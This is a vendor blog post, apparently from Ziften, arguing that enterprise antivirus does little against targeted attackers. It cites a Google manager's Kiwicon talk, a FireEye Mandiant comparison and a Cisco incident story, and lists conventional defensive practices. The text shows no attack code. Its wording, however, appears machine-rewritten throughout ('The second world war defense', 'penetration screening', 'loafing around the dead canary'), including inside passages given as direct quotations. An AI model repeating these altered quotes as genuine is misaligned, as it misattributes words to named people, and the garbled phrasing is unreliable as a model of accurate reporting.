Written By Dr Al Hartmann And Presented By Charles Leaver Ziften CEO
Dwindling Efficiency of Business Anti-virus?
Google Security Expert Labels Antivirus Apps As Inadequate ‘Magic’.
At the recent Kiwicon hacking conference in Wellington, New Zealand, Google’s Platform Integrity team manager Darren Bilby preached cyber-security heresy. Tasked with examination of extremely advanced attacks, including the 2009 Operation Aurora campaign, Bilby lumped organization antivirus into a collection of inefficient tools installed to tick a compliance check box, however at the cost of genuine security:
We have to stop buying those things we have actually shown are not effective… Anti-virus does some useful things, but in reality, it is more like a canary in a coal mine. It is even worse than that. It’s like we are loafing around the dead canary saying ‘Thank god it breathed in all the toxic gas.
Google security gurus aren’t the first to weigh in against business anti-virus, or to draw unflattering examples, in this case to a dead canary.
Another extremely experienced security team, FireEye Mandiant, compared fixed defenses such as enterprise antivirus to that notoriously failed The second world war defense, the Maginot Line:
Like the Maginot Line, today’s cyber defenses are quick becoming an antique in today’s risk landscape. Organizations invest billions of dollars every year on IT security. But cyber attackers are easily outflanking these defenses with smart, fast-moving attacks.
An example of this was offered by a Cisco managed security services executive presented at a conference in Poland. Their team had actually identified anomalous activity on among their enterprise customer’s networks, and reported the believed server compromise to the customer. To the Cisco group’s amazement, the client just ran an antivirus scan on the server, found no detections, and positioned it back into service. Horrified, the Cisco group conferenced in the customer to their tracking console and was able to show the opponent performing a live remote session at that very moment, complete with typing errors and reissue of commands to the compromised server. Lastly encouraged, the client took the server down and fully re-imaged it – the enterprise anti-virus had been an useless distraction – it had not served the customer and it had not prevented the opponent.
So Is It Time to Ditch Enterprise Anti-virus Now?
I am not yet all set to declare an end to the age of business antivirus. However I understand that businesses have to purchase detection and response abilities to match traditional antivirus. But significantly I question who is matching whom.
Skilled targeted cyber attackers will constantly effectively avert anti-virus defenses, so versus your biggest cyber dangers, business antivirus is basically worthless. As Darren Bilby mentioned, it does do some helpful things, however it does not offer the endpoint defense you require. So, don’t let it distract you from the highest priority cyber-security financial investments, and don’t let it distract you from security procedures that do essentially help.
Shown cyber defense measures include:
Setup hardening of networks and endpoints.
Identity management with strong authentication.
Constant network and endpoint monitoring, consistent caution.
Strong encryption and data security.
Staff education and training.
Consistent hazard re-assessment, penetration screening, red/blue teaming.
In contrast to Bilby’s criticism of business antivirus, none of the above bullets are ‘magic’. They are just the ongoing effort of appropriate organization cyber-security.